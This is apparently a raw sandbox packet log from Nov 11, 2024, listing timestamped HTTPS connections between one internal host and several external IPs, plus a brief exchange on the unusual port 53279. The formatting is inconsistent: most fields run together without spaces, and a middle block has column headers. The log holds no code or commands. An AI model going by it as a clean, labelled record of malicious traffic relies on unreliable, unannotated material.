                                                                                                                                                                                                        Nov 11, 2024 08:11:05.208831072 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.208978891 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.209024906 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.209301949 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.215306997 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.221872091 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.221996069 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.222138882 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.222183943 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.222502947 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.228830099 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.234942913 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.235059023 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.235198975 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.235244036 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.235465050 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.241452932 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.249063015 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.249180079 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.249330044 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.249376059 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.249629974 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.254386902 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.260828972 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.260974884 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.261089087 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.261121035 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.261311054 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.266880035 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.272550106 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.272686958 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.272897005 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.272942066 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.273143053 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.278351068 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.284132957 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.284269094 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.284327030 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.284380913 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.284574032 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.289846897 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.296036005 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.296322107 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.296371937 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.299174070 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.299309015 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.299501896 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.299556971 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.299820900 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.304668903 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.306159973 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.306294918 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.306437016 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.306492090 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.306761980 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.309561014 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.313056946 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.313199997 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.313282013 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.313334942 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.313586950 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.316776037 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.322063923 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.322201014 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.322285891 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.322341919 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.322530031 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.323642015 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.326864004 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.327002048 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.327069998 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.327138901 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.327398062 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.330219984 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.333607912 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.333748102 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.333892107 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.333956003 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.334152937 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.336908102 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.340217113 CET44349781172.217.215.132192.168.11.20
Timestamp                            SrcPort  DstPort  Source IP        Dest IP
Nov 11, 2024 08:11:05.340353966 CET      443    49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.340492964 CET    49781      443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.340548038 CET      443    49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.340856075 CET    49781      443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.343440056 CET      443    49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.346703053 CET      443    49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.346914053 CET      443    49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.346947908 CET    49781      443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.346987009 CET      443    49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.347131014 CET    49781      443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.347192049 CET      443    49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.347204924 CET    49781      443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.347215891 CET      443    49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.347244978 CET      443    49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.347404003 CET    49781      443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.347404003 CET    49781      443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.347457886 CET    49781      443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:09.188663960 CET    53279    49769  87.120.114.20    192.168.11.20
Nov 11, 2024 08:11:09.189948082 CET    49769    53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:11:09.463670015 CET    53279    49769  87.120.114.20    192.168.11.20
Nov 11, 2024 08:11:11.686825037 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:11.686877966 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:11.687737942 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:11.687932968 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:11.687973976 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:12.020724058 CET    49762      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.020932913 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.020977974 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.021148920 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.021198034 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.021215916 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.161946058 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:12.162276983 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:12.168365955 CET      443    49762  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.168623924 CET    49762      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.173806906 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:12.173814058 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:12.174032927 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:12.175446987 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:12.175446987 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:12.175476074 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:12.481262922 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.481573105 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.485987902 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.485994101 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.486228943 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.486974955 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.487035036 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.487051010 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.487091064 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.487097979 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.512375116 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:12.512387037 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:12.512439966 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:12.512553930 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:12.512667894 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:12.512980938 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:12.512980938 CET    49785      443  192.168.11.20    40.126.29.12
Nov 11, 2024 08:11:12.512989998 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:12.512994051 CET      443    49785  40.126.29.12     192.168.11.20
Nov 11, 2024 08:11:12.546108007 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:12.546124935 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:12.546569109 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:12.555942059 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:12.555954933 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:12.829216003 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.829226971 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.829272985 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.829365015 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.829365015 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.829510927 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.829641104 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.829641104 CET    49786      443  192.168.11.20    20.190.135.7
Nov 11, 2024 08:11:12.829653025 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:12.829655886 CET      443    49786  20.190.135.7     192.168.11.20
Nov 11, 2024 08:11:13.012353897 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:13.012659073 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:13.012667894 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:13.013451099 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:13.013659000 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:13.014530897 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:13.014620066 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:13.014807940 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:13.014816999 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:13.056586981 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:13.379827976 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:13.379842997 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:13.379889965 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:13.380040884 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:13.380043030 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:13.380254984 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:13.380407095 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:13.380616903 CET    63505      443  192.168.11.20    52.123.251.14
Nov 11, 2024 08:11:13.380633116 CET      443    63505  52.123.251.14    192.168.11.20
Nov 11, 2024 08:11:14.202097893 CET    60796      443  192.168.11.20    3.163.101.92
Nov 11, 2024 08:11:14.202119112 CET      443    60796  3.163.101.92     192.168.11.20
Nov 11, 2024 08:11:14.202260971 CET    60796      443  192.168.11.20    3.163.101.92
Nov 11, 2024 08:11:14.202754021 CET    60796      443  192.168.11.20    3.163.101.92
Nov 11, 2024 08:11:14.202768087 CET      443    60796  3.163.101.92     192.168.11.20
Nov 11, 2024 08:11:14.467073917 CET      443    60796  3.163.101.92     192.168.11.20
Nov 11, 2024 08:11:14.467669010 CET    60796      443  192.168.11.20    3.163.101.92
Nov 11, 2024 08:11:14.467691898 CET      443    60796  3.163.101.92     192.168.11.20
Nov 11, 2024 08:11:14.469569921 CET      443    60796  3.163.101.92     192.168.11.20
Nov 11, 2024 08:11:14.469763041 CET    60796      443  192.168.11.20    3.163.101.92
Nov 11, 2024 08:11:14.470998049 CET    60796      443  192.168.11.20    3.163.101.92
Nov 11, 2024 08:11:14.471155882 CET      443    60796  3.163.101.92     192.168.11.20
Nov 11, 2024 08:11:14.514369965 CET    60796      443  192.168.11.20    3.163.101.92
Nov 11, 2024 08:11:14.514385939 CET      443    60796  3.163.101.92     192.168.11.20
Nov 11, 2024 08:11:14.560578108 CET    60796      443  192.168.11.20    3.163.101.92
Nov 11, 2024 08:11:17.287137985 CET    57983      443  192.168.11.20    172.64.41.3
Nov 11, 2024 08:11:17.287156105 CET      443    57983  172.64.41.3      192.168.11.20
Nov 11, 2024 08:11:17.287228107 CET    55810      443  192.168.11.20    149.112.112.112
Nov 11, 2024 08:11:17.287254095 CET      443    55810  149.112.112.112  192.168.11.20
Nov 11, 2024 08:11:17.287374973 CET    57983      443  192.168.11.20    172.64.41.3
Nov 11, 2024 08:11:17.287414074 CET    59315      443  192.168.11.20    149.112.112.112
Nov 11, 2024 08:11:17.287452936 CET      443    59315  149.112.112.112  192.168.11.20
Nov 11, 2024 08:11:17.287493944 CET    55810      443  192.168.11.20    149.112.112.112
Nov 11, 2024 08:11:17.287493944 CET    60368      443  192.168.11.20    172.64.41.3
Nov 11, 2024 08:11:17.287522078 CET      443    60368  172.64.41.3      192.168.11.20
Nov 11, 2024 08:11:17.287583113 CET    64413      443  192.168.11.20    149.112.112.112
Nov 11, 2024 08:11:17.287596941 CET      443    64413  149.112.112.112  192.168.11.20
Nov 11, 2024 08:11:17.287633896 CET    59315      443  192.168.11.20    149.112.112.112
Nov 11, 2024 08:11:17.287708998 CET    60368      443  192.168.11.20    172.64.41.3
Nov 11, 2024 08:11:17.287738085 CET    53091      443  192.168.11.20    172.64.41.3
Nov 11, 2024 08:11:17.287739038 CET    64413      443  192.168.11.20    149.112.112.112
Nov 11, 2024 08:11:17.287745953 CET      443    53091  172.64.41.3      192.168.11.20
Nov 11, 2024 08:11:17.287898064 CET    57983      443  192.168.11.20    172.64.41.3
Nov 11, 2024 08:11:17.287908077 CET      443    57983  172.64.41.3      192.168.11.20
Nov 11, 2024 08:11:17.287929058 CET    53091      443  192.168.11.20    172.64.41.3
Nov 11, 2024 08:11:17.288016081 CET    55810      443  192.168.11.20    149.112.112.112
Nov 11, 2024 08:11:17.288036108 CET      443    55810  149.112.112.112  192.168.11.20
Nov 11, 2024 08:11:17.288134098 CET    59315      443  192.168.11.20    149.112.112.112
Nov 11, 2024 08:11:17.288146973 CET      443    59315  149.112.112.112  192.168.11.20
Nov 11, 2024 08:11:17.288563013 CET    60368      443  192.168.11.20    172.64.41.3
Nov 11, 2024 08:11:17.288569927 CET      443    60368  172.64.41.3      192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288666964 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288676977 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288783073 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288789988 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.528763056 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.529123068 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.529134035 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.529938936 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530071974 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530163050 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530189037 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530352116 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530493975 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530498981 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530631065 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530950069 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530957937 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531277895 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531286001 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531388998 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531419039 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531465054 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531784058 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532069921 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532078981 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532371998 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532438040 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532486916 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532509089 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532573938 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532582998 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532777071 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532804012 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533082962 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533087015 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533135891 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533299923 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533312082 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533624887 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533627033 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533720970 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533766031 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533819914 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533879995 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534089088 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534094095 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534290075 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534368038 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534425974 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534459114 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534502983 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534729004 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535120010 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535206079 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535217047 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535583973 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535626888 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535631895 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573795080 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573795080 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573801994 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573806047 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573827028 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573838949 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573872089 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573884010 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.575958967 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.575961113 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.589432955 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.589432955 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.589437962 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.589441061 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.620660067 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.620712042 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.620713949 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.620742083 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.636326075 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.636326075 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762485027 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762514114 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762671947 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762697935 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762783051 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762810946 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763019085 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763047934 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763139009 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763160944 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763708115 CET44355810149.112.112.112192.168.11.20
